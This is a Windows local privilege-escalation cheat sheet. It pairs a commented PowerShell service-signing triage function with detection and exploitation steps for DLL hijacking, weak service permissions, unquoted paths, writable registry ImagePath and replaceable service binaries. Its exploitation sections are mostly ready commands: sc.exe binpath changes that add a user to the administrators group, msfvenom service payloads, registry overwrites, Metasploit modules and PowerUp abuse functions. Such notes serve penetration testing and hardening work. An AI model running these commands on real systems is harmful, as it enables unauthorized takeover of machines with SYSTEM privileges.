Services and Processes

Get non-standard processes (Seatbelt flags processes whose image is not signed by Microsoft; treat the list as a triage starting point, not as proof of anything)

Seatbelt.exe NonstandardProcesses

Get non-standard services (same signing heuristic applied to service binaries; the PowerShell equivalent below shows what "non-standard" means here)

Seatbelt.exe NonstandardServices

https://gist.github.com/HarmJ0y/7363509435f5700d713ee351bb4fcd8f

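function Get-NonstandardService {
<#
.SYNOPSIS
Enumerates Windows services whose binary does not carry a valid Microsoft-issued Authenticode signature.

.DESCRIPTION
Queries Win32_Service through WMI, extracts the service binary from each PathName, reads its
Authenticode signature and emits one object per service that is unsigned, carries an invalid
or tampered signature, has an issuer string not containing 'Microsoft', or whose binary could
not be parsed out of PathName or located on disk. Metadata is cached per binary so a host
executable shared by many services (svchost.exe, for example) is inspected once.

Caveats for the reviewer: Get-AuthenticodeSignature validates the chain against the local
machine's trust store, so an attacker who could add a trusted root can make a hostile binary
report 'Valid'; the issuer test is a plain substring match on the issuer DN, not a check that
the chain terminates at a Microsoft root. Use the output as a triage list.

.OUTPUTS
PSObject with Path, Signed, SignatureStatus, Issuer, IsDotNet, Name, PathName, StartMode,
State and ProcessID. Signed is $True only when the signature status is 'Valid'.
#>
    [CmdletBinding()]
    Param()

    # Shallow copy of a PSObject's properties so per-service fields can be added without
    # mutating the object held in the metadata cache. A $null input yields an empty object.
    function CloneObject($Object) {
        $Copy = New-Object PSObject
        if ($Object) {
            foreach ($Prop in $Object.psobject.Properties) {
                Add-Member -MemberType NoteProperty -InputObject $Copy -Name $Prop.Name -Value $Prop.Value
            }
        }
        $Copy
    }

    # Pull the executable path out of a service PathName, which may be quoted and may carry
    # arguments (e.g. "C:\Windows\system32\svchost.exe -k netsvcs").
    # Returns $null (after a warning) when no drive-rooted .exe/.dll/.sys path is found.
    function Get-BinaryBasePath {

        [CmdletBinding()]
        Param(
            [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
            [Alias('PathName', 'FilePath')]
            [String]
            $Path
        )

        # -match is case-insensitive by default, so [a-z] also accepts upper-case drive letters.
        if ($Path -and ($Path -match '^\W*(?<ServicePath>[a-z]:\\.+?(\.exe|\.dll|\.sys))\W*')) {
            $Matches['ServicePath']
        }
        else {
            Write-Warning "Regex failed for the following path: $Path"
        }
    }

    # Collect signing and .NET metadata for one binary. Returns nothing when the path cannot
    # be resolved; the caller turns that into an 'Unresolved' record.
    function Get-PEMetaData {

        [CmdletBinding()]
        param($Path)

        try {
            $FullPath = Resolve-Path -Path $Path -ErrorAction Stop
            try {
                # GetAssemblyName throws for native (non-CLR) images, which is the signal used here.
                $Null = [Reflection.AssemblyName]::GetAssemblyName($FullPath)
                $IsDotNet = $True
            }
            catch {
                $IsDotNet = $False
            }

            $Signature = Get-AuthenticodeSignature -FilePath $FullPath -ErrorAction SilentlyContinue
            if ($Signature) {
                $Status = [String]$Signature.Status
                $Issuer = if ($Signature.SignerCertificate) { $Signature.SignerCertificate.Issuer } else { $Null }
            }
            else {
                # Cmdlet failed (locked file, unreadable path): report it rather than assume it is signed.
                $Status = 'Unknown'
                $Issuer = $Null
            }
            # Only a chain-valid, hash-matching signature counts as signed. 'HashMismatch' (binary
            # modified after signing) and 'NotTrusted' still expose a SignerCertificate, and the
            # earlier "anything but NotSigned" test let such a file hide behind a Microsoft issuer.
            $Signed = ($Status -eq 'Valid')

            $Out = New-Object PSObject
            $Out | Add-Member Noteproperty 'Path' $FullPath
            $Out | Add-Member Noteproperty 'Signed' $Signed
            $Out | Add-Member Noteproperty 'SignatureStatus' $Status
            $Out | Add-Member Noteproperty 'Issuer' $Issuer
            $Out | Add-Member Noteproperty 'IsDotNet' $IsDotNet
            $Out
        }
        catch {
            Write-Warning "Unable to resolve path: $Path"
        }
    }

    # Metadata keyed by binary path: many services share one host binary.
    $MetadataCache = @{}
    Get-WmiObject -Class win32_Service -Property Name,PathName,StartMode,State,ProcessID | Where-Object { $_.PathName } | ForEach-Object {
        $BasePath = Get-BinaryBasePath -Path $_.PathName
        $ServiceName = $_.Name

        Write-Verbose "[Get-NonstandardService] Service $ServiceName : $BasePath"

        if (-not $BasePath) {
            # Unparseable PathName: a $null hashtable key throws on assignment, so bypass the
            # cache. The service is still reported below instead of being silently dropped.
            $Metadata = $Null
        }
        elseif ($MetadataCache.ContainsKey($BasePath)) {
            $Metadata = $MetadataCache[$BasePath]
        }
        else {
            $Metadata = Get-PEMetaData -Path $BasePath
            # Cache $null results as well so an unresolvable binary is probed (and warned about) once.
            $MetadataCache[$BasePath] = $Metadata
        }

        if (-not $Metadata) {
            # The binary could not be inspected: surface it as unsigned so it appears in the output.
            $Metadata = New-Object PSObject
            $Metadata | Add-Member Noteproperty 'Path' $BasePath
            $Metadata | Add-Member Noteproperty 'Signed' $False
            $Metadata | Add-Member Noteproperty 'SignatureStatus' 'Unresolved'
            $Metadata | Add-Member Noteproperty 'Issuer' $Null
            $Metadata | Add-Member Noteproperty 'IsDotNet' $False
        }

        $Record = CloneObject $Metadata
        $Record | Add-Member Noteproperty 'Name' $ServiceName
        $Record | Add-Member Noteproperty 'PathName' $_.PathName
        $Record | Add-Member Noteproperty 'StartMode' $_.StartMode
        $Record | Add-Member Noteproperty 'State' $_.State
        $Record | Add-Member Noteproperty 'ProcessID' $_.ProcessID
        $Record
    } | Where-Object { (-not $_.Signed) -or ($_.Issuer -notmatch 'Microsoft') }
}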

DLL Hijacking

Detection

dumpbin.exe /dependents <exec file>
procmon (filter on Result = NAME NOT FOUND and Path ends with .dll to see DLL lookups that fall through to a directory you can write to; only writable locations earlier in the search order matter)
exploit/windows/local/ikeext_service (Metasploit module that drops wlbsctrl.dll for the IKEEXT service into a writable directory on the system PATH — this is an exploitation step, not a detection one)
PowerUp.ps1: Find-PathDLLHijack / Find-ProcessDLLHijack / Write-HijackDll

Exploitation

BinPath

https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe (archived 2008 build, presumably kept because it still runs on old Windows targets; current builds live at live.sysinternals.com. Pass -accepteula so the first run does not block on the EULA prompt.)
Detection

sc.exe sdshow <service name> (SDDL output; look for an ACE granting CC (SERVICE_CHANGE_CONFIG), WD (WRITE_DAC), WO (WRITE_OWNER) or GA to a SID you hold, e.g. BU (Users), AU (Authenticated Users), WD (Everyone) or IU (Interactive))
accesschk.exe -uvwc <service name>
accesschk.exe -uwcqv "Authenticated Users" * -accepteula (every service writable by that group; repeat for Users and Everyone)
PowerUp.ps1: Get-ModifiableService

Exploitation

sc.exe config <service_name> binpath= "<cmd>" (the space after binpath= is required by sc.exe; the command runs as the service account, usually LocalSystem, so e.g. net localgroup administrators <user> /add is enough)
  then sc.exe start <service_name> — needs SERVICE_START on the service; otherwise wait for a reboot if the service is auto-start. A non-service binary is killed by the SCM after ~30 s (error 1053) but has already executed. Restore the original binPath afterwards.
exploit/windows/local/service_permissions
PowerUp.ps1: Invoke-ServiceAbuse -Name <service name> (-Command <cmd>)

Unquoted Path

Detection

wmic service get name,pathname
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
Get-WmiObject win32_service | select Name,PathName,StartMode,StartName | where {$_.StartMode -ne "Disabled" -and $_.StartName -eq "LocalSystem" -and $_.PathName -notmatch '^"' -and $_.PathName -match ' '}
(an unquoted path with a space is only exploitable if you can write to one of the intermediate directories, e.g. C:\ or C:\Program Files\Vendor\; check each candidate with icacls before counting it)
PowerUp.ps1: Get-ServiceUnquoted

Exploitation

exploit/windows/local/trusted_service_path
PowerUp.ps1: Write-ServiceBinary -Name <service name> -Path <hijack_path>

Registry

Detection

Get-Acl -Path HKLM:\System\CurrentControlSet\services\* | select Path,AccessToString | Format-List
Get-Acl -Path hklm:\System\CurrentControlSet\services\* | fl | Out-String -Stream | Select-String "Users Allow  FullControl" -Context 5,5 (this pattern only catches FullControl for "Users"; SetValue, CreateSubKey or WriteKey granted to Users, Authenticated Users, Everyone or INTERACTIVE is just as sufficient, so widen the search)
accesschk.exe -kvusw <user> hklm\System\CurrentControlSet\services
accessenum.exe

Exploitation

1) msfvenom -p windows/exec CMD=<cmd> -f exe-service -o <bin> (No AV consideration; the format flag is -f, and exe-service makes the binary answer the SCM so it is not killed at the 30 s start timeout)
2) reg.exe add HKLM\SYSTEM\CurrentControlSet\services\<service_name> /v ImagePath /t REG_EXPAND_SZ /d <path_exe> /f
2) New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\services\<service_name> -Name ImagePath -Value <value> -PropertyType ExpandString -Force
   (the new ImagePath is only read when the service (re)starts: sc.exe start, or a reboot for auto-start services you cannot start yourself; save the original value first)

Executable File

Detection

icacls.exe <dir_or_file>
accesschk.exe -wvu <dir_or_file>
accessenum.exe
Get-ChildItem <path_dir> -Recurse | Get-Acl | select Path,Owner,AccessToString,Group | Format-List
(in icacls/ACL output, (F), (M), (W), WDAC or WO granted to Users, Authenticated Users or Everyone on the binary or its parent directory is what matters)
PowerUp.ps1: Get-ModifiableServiceFile

Exploitation

1) msfvenom -p windows/exec CMD=<cmd> -f exe-service -o <bin> (No AV consideration; the format flag is -f)
2) Back up the original binary, then overwrite it within the identified path; the replacement only runs when the service restarts (sc.exe stop/start, or a reboot if you lack SERVICE_STOP/SERVICE_START)
2) PowerUp.ps1: Invoke-ServiceAbuse -Name <service>
2) exploit/windows/local/service_permissions